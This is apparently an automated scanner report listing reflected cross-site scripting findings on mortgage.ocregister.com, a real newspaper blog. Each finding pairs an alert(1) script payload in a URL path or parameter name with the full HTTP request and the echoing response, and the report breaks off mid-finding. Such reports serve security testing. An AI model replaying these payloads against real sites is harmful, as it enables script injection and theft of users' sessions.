GET /2010/10fbcf4"><script>alert(1)</script>defd5ce1a69/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:18 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10fbcf4\"><script>alert(1)</script>defd5ce1a69/feed/" /> ...[SNIP]...
1.347. http://mortgage.ocregister.com/2010/10/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69fc7"><script>alert(1)</script>e6e9254e02c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69fc7\"><script>alert(1)</script>e6e9254e02c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/10/?69fc7"><script>alert(1)</script>e6e9254e02c=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 97601
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10/?69fc7\"><script>alert(1)</script>e6e9254e02c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8f1"><script>alert(1)</script>d0a62076da8 was submitted in the REST URL parameter 1. This input was echoed as cb8f1\"><script>alert(1)</script>d0a62076da8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010cb8f1"><script>alert(1)</script>d0a62076da8/11/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:13 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010cb8f1\"><script>alert(1)</script>d0a62076da8/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b677c"><script>alert(1)</script>be838dc77bd was submitted in the REST URL parameter 2. This input was echoed as b677c\"><script>alert(1)</script>be838dc77bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11b677c"><script>alert(1)</script>be838dc77bd/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:17 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11b677c\"><script>alert(1)</script>be838dc77bd/feed/" /> ...[SNIP]...
1.350. http://mortgage.ocregister.com/2010/11/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb71"><script>alert(1)</script>e8fe4cf5fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbb71\"><script>alert(1)</script>e8fe4cf5fe1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/?fbb71"><script>alert(1)</script>e8fe4cf5fe1=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:04 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11/?fbb71\"><script>alert(1)</script>e8fe4cf5fe1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe7d"><script>alert(1)</script>9448cd28c6b was submitted in the REST URL parameter 1. This input was echoed as dbe7d\"><script>alert(1)</script>9448cd28c6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010dbe7d"><script>alert(1)</script>9448cd28c6b/12/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010dbe7d\"><script>alert(1)</script>9448cd28c6b/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf92"><script>alert(1)</script>76f411482be was submitted in the REST URL parameter 2. This input was echoed as bbf92\"><script>alert(1)</script>76f411482be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12bbf92"><script>alert(1)</script>76f411482be/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12bbf92\"><script>alert(1)</script>76f411482be/feed/" /> ...[SNIP]...
1.353. http://mortgage.ocregister.com/2010/12/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a315"><script>alert(1)</script>fc303a44594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a315\"><script>alert(1)</script>fc303a44594 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/?3a315"><script>alert(1)</script>fc303a44594=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 116006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12/?3a315\"><script>alert(1)</script>fc303a44594=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4cbf"><script>alert(1)</script>bf63c84bd54 was submitted in the REST URL parameter 1. This input was echoed as d4cbf\"><script>alert(1)</script>bf63c84bd54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011d4cbf"><script>alert(1)</script>bf63c84bd54/01/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:00 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011d4cbf\"><script>alert(1)</script>bf63c84bd54/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eafb"><script>alert(1)</script>e74c7ede1c7 was submitted in the REST URL parameter 2. This input was echoed as 6eafb\"><script>alert(1)</script>e74c7ede1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/016eafb"><script>alert(1)</script>e74c7ede1c7/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:03 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/016eafb\"><script>alert(1)</script>e74c7ede1c7/feed/" /> ...[SNIP]...
1.356. http://mortgage.ocregister.com/2011/01/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2011/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6821d"><script>alert(1)</script>a9bdec31fc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6821d\"><script>alert(1)</script>a9bdec31fc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/?6821d"><script>alert(1)</script>a9bdec31fc9=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:11:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 100078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2011 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/?6821d\"><script>alert(1)</script>a9bdec31fc9=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf68d"><script>alert(1)</script>b4fa67ceb86 was submitted in the REST URL parameter 5. This input was echoed as cf68d\"><script>alert(1)</script>b4fa67ceb86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d"><script>alert(1)</script>b4fa67ceb86/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:10:01 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:10:02 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... nk rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d\"><script>alert(1)</script>b4fa67ceb86/feed/" /> ...[SNIP]...
1.358. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a165b"><script>alert(1)</script>757581a972c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a165b\"><script>alert(1)</script>757581a972c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b"><script>alert(1)</script>757581a972c=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... "application/rss+xml" title=" Upside down but still on a good path - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b\"><script>alert(1)</script>757581a972c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2896b"><script>alert(1)</script>20b18d9fc89 was submitted in the REST URL parameter 5. This input was echoed as 2896b\"><script>alert(1)</script>20b18d9fc89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/13/late-o-c-mortgage-payments-drop/413342896b"><script>alert(1)</script>20b18d9fc89/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:09:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:57 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/413342896b\"><script>alert(1)</script>20b18d9fc89/feed/" /> ...[SNIP]...
1.360. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dce"><script>alert(1)</script>046932d1455 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dce\"><script>alert(1)</script>046932d1455 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce"><script>alert(1)</script>046932d1455=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... te" type="application/rss+xml" title=" Late O.C. mortgage payments drop - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce\"><script>alert(1)</script>046932d1455=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18630"><script>alert(1)</script>df0e4fbd4ac was submitted in the REST URL parameter 5. This input was echoed as 18630\"><script>alert(1)</script>df0e4fbd4ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
